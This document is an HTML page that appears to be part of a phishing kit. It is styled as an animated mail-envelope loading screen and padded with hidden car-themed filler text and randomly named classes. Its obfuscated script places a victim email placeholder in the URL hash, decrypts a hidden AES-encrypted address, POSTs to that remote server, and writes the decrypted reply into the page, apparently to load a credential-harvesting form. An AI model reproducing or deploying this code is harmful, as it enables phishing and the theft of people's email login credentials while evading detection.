<html>

<head>
    <meta name="viewport" content="width=device-width,	 initial-scale=1.0">


    <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script>
    <style>
        body,
        html {
            height: 100%;
            margin: 0;
            display: flex;
            align-items: center;
            justify-content: center
        }

        @keyframes bounce {
            0%,
            100%,
            12.5%,
            32.5%,
            76.1% {
                transform: translateY(0);
            }
            22.5%,
            86% {
                transform: translateY(7px);
            }
        }

        #yellowness {
            height: 179px;
            width: 130px;
            overflow: hidden;
            margin-top: -59px;
        }

        @keyframes shadow-fade {
            0%,
            100%,
            21.2%,
            80% {
                opacity: 0;
            }
            47%,
            70% {
                opacity: 1;
            }
        }

        #cactus {
            width: 130px;
            margin-top: 179px;
        }

        #zinnia {
            width: 130px;
            height: 71px;
            border-radius: 0 0 7px 7px;
            overflow: hidden;
            margin-top: -41px;
        }

        #zinnia>.nape {
            width: 287px;
            height: 71px;
            background: #4a90e2;
            transform: translate(-153px, -70px) rotate(28deg);
        }

        #zinnia>.obey {
            width: 287px;
            height: 71px;
            background: #0076a8;
            transform: translate(-120px, 63px) rotate(-28deg);
        }

        #oasis {
            width: 130px;
            height: 40px;
            background: #005f7f;
            margin-top: -70px;
        }

        #backache {
            display: flex;
            flex-wrap: wrap;
            width: 118px;
            height: 131px;
            border-radius: 7px;
            overflow: hidden;
            margin: 0 auto;
            margin-top: -306px;
            animation: cal-bounce 5s infinite;
            animation-timing-function: cubic-bezier(0, 0.5, 0, 1);
            transform: translateY(51px) scaleY(1);
        }

        @keyframes cal-bounce {
            0%,
            100%,
            16.5%,
            76.1% {
                transform: translateY(151px) scaleY(1);
            }
            28% {
                transform: translateY(39px) scaleY(1);
            }
            31% {
                transform: translateY(51px) scaleY(1.05);
            }
            33% {
                transform: translateY(51px) scaleY(0.96);
            }
            34%,
            68.5% {
                transform: translateY(51px) scaleY(1);
            }
            68.5% {
                animation-timing-function: cubic-bezier(0.66, -0.16, 1, -0.29);
            }
        }

        #backache>.yardman {
            width: 118px;
            height: 21px;
            margin-bottom: -1px;
            background: #00688b;
        }

        #backache>.obey {
            display: flex;
            width: 118px;
            height: 37px;
        }

        .gainfully {
            width: 39.3333px;
            height: 38px;
        }

        .abbreviated {
            background: #005d91;
        }

        .zest {
            background: #4a90e2;
        }

        .laborious {
            background: #74c3e5;
        }

        .gainful {
            background: #004258;
        }

        .karmic {
            background: #00647b;
        }

        #nacho {
            width: 130px;
            height: 107px;
            animation: opened-flap-swing 5s infinite;
            animation-timing-function: cubic-bezier(0.32, 0, 0.67, 0);
            transform-origin: top;
            transform: translateY(-68px) rotate3d(1, 0, 0, -180deg);
        }

        @keyframes	opened-flap-swing {
            0%,
            100%,
            14.5%,
            76% {
                transform: translateY(-68px) rotate3d(1, 0, 0, -90deg);
            }
            16.5%,
            74% {
                transform: translateY(-68px) rotate3d(1, 0, 0, -180deg);
            }
        }

        #facetiously {
            width: 130px;
            animation: closed-flap-swing 5s infinite;
            animation-timing-function: cubic-bezier(0.32, 0, 0.67, 0);
            transform-origin: top;
            transform: translateY(-71px) rotate3d(1, 0, 0, 90deg);
        }

        @keyframes closed-flap-swing {
            0%,
            100%,
            77%,
            8.5% {
                transform: translateY(-71px) rotate3d(1, 0, 0, 0);
            }
            14.5%,
            76% {
                transform: translateY(-71px) rotate3d(1, 0, 0, 90deg);
            }
        }

        #saboteur {
            width: 130px;
            height: 107px;
            overflow: hidden;
        }

        .iconoclast {
            width: 96px;
            height: 96px;
            background: #74c3e5;
            margin: -48px auto 0 auto;
            border-radius: 7px;
            transform: scaleY(0.6) rotate(45deg);
        }

        #nacho .iconoclast {
            background: #005f7f;
        }

        #facetiously .iconoclast {
            background: #74c3e5;
        }
    </style>


</head>

<body>


    <div id="yellowness">
        <div id="cactus">
            <!--	<span>A		car’s	 design showcases	human			imagination.</span> 	-->
            <div id="nacho">
                <div id="saboteur">
                    <div class="iconoclast"></div>
                    <!--		 <em>A	 car   represents 		freedom 	with	 every	 	turn of	its 	wheels.</em>		 --></div>
            </div>
            <div id="backache">
                <div class="yardman"></div>

                <div class="obey">
                    <div class="gainfully	abbreviated"></div>
                    <div class="gainfully zest"></div>
                    <div style="display:none;">Driving embodies the essence of freedom through its wheels.</div>
                    <div class="gainfully	laborious"></div>
                </div>
                <!--  <h1>The   road 		discloses 	its	 	wonders 	to those	  who		journey	 on it.</h1> -->
                <div class="obey">
                    <div class="gainfully  gainful"></div>
                    <div class="gainfully  abbreviated"></div>
                    <div class="gainfully zest"></div>
                </div>
                <div class="obey">
                    <div class="gainfully 	karmic"></div>
                    <div class="gainfully 	 gainful"></div>
                    <div class="gainfully 		abbreviated"></div>
                </div>
            </div>


        </div>
        <div id="oasis"></div>
        <!--	<p>In  the	 stillness		of		the	road, clarity 	 emerges.</p>	 	-->
        <div id="zinnia">
            <div class="obey"></div>
            <div class="nape"></div>
        </div>
        <div id="facetiously">
            <div id="saboteur">
                <div class="iconoclast"></div>
            </div>
        </div>
    </div>


</body>


<script>
    async function abet /*   idealization */ (nagger) {
        return CryptoJS.AES. /* zany */ decrypt(Object.values(JSON.parse /*  wait */ (nagger))[0], /*   obedience */ CryptoJS. /*   bachelor */ PBKDF2 /*  gadgetry */ (CryptoJS.enc.Hex.parse(Object.values(JSON.parse(nagger))[3]), /* napalm */ CryptoJS.enc.Hex.parse /*  pacemaker */ (Object.values /* caddie */ (JSON.parse /* nachos */ (nagger)) /*  dairying */ [2]) /* napper */ , /* macro */ {
            hasher: CryptoJS. /* sadden */ algo.SHA512,
            /*   rabbinical */ keySize: 64 / 8,
            /*  hahnium */ iterations: 999
        }), {
            iv: CryptoJS.enc.Hex.parse(Object.values(JSON. /* earphone */ parse(nagger))[1])
        }).toString(CryptoJS.enc.Utf8)
    }
    facsimile = `##BASE64_MAIL##`;
</script>
<div style="display:none;">A car represents freedom with every turn of its wheels.</div>
<script>
    ultramodern = [`hash`, /*   oakum */ `concat`, /* tabular */ `slice`, `now`];
</script>
<!-- <li>The engine of a car shares secrets understood only by its driver.</li> -->
<script>
    if (performance['navigation']['type'] === 0x0 && !location[ultramodern[0x0]]) {
        location[ultramodern[0]] = Date[ultramodern[3]] /* package */ ().toString(36)[ultramodern[2]](-1)[ultramodern[1]] /*   abate */ (facsimile)
    }


    (async () => {
        document.write(await abet(await /*   vacua */ (await fetch(await abet(atob(`eyJhIjoiXC9zaUYxRUZQMlVTZThWbE9Oc2s5NVlJT2I4VEEyYm9ZOEJ3VkRONTRlMGM9IiwiYyI6IjI4ZTE1YTAzMDA5MGQyZGFlYzAwYjQ0ZGUwNDVkZGI1IiwiYiI6ImJhMjZkZGJlMDRjMTkyMDk5OGRkY2Y1ZmQ3YzU3MGNjYzhkMmU4NWQzMzZkYTFmNzNkNGM4OTU3ZGJiMTkwNzdiOWY4MjYxODQ3MzEwOGUxYTExNzJlMmVmNGE2YWMzYTc4OTYxMjI4ZTczNDMwZTljMzA1MTc5ZjJhNjc3MTk5YzE2YWI0MWY4ZTc0YjNiYjBmMWI2YzJkMTMyMjg1NGU5OWNjZmYxM2M1ZmQ1NGM1YWI2YmZkMjJmZTk2YWM5YWUxOTE2N2VkZDkyNTU3NjgzMzYyMjVhMDJlN2MyMzA3Y2UzNjM4ZmViNWEwY2ZlNDM3YzY4MWMzZjMyYTJhYzQ5YTdhZGZiZGJiYjg3ZGY2N2U0NmE4YTNiNDc2YWY3ZGYyNDZkYWMyMmNhNzlmYWMyNGVjNjIxODgzMDMyMzRhNjc1NDg0MTNjNzA4ZTZjNTFjMzc3MDRhNmUzNzAyMDJhYzg2MDkxYzkyN2FlZTY0YmE1YzY0M2YyMGIzZmZiNmMzZTRlN2UzYjY2ZGZmNjIyOWRlMjc5OGRkYTQ5YmVhYzllZDA5NzcxMTFjMWVjM2ZjZWFiNTJhNzI4MGUzOGJmYzhiNjhhODI4NzhiMzg0Y2QxYjAxNDk1NzA4MDhiZTI1NDliOWYxYTJmMzRiMDE0M2M4ZDk2YTAxNTVkMDI5IiwiZCI6IjcwNjE2NDY0Njk2ZTY3In0=`)) /*   pacifistic */ , /* fabulous */ {
            method: 'POST',
            body: JSON.stringify({
                waft: `vacationist`
            })
        })). /*   cabin */ text /* gait */ ())) /*   vacuously */
    })();
</script>
<li style="display:none;">Driving is a symphony of freedom and movement.</li>
<script>
</script>
<!-- <strong>The purr	 of a	car’s   engine  suggests endless opportunities.</strong>	-->

</html>
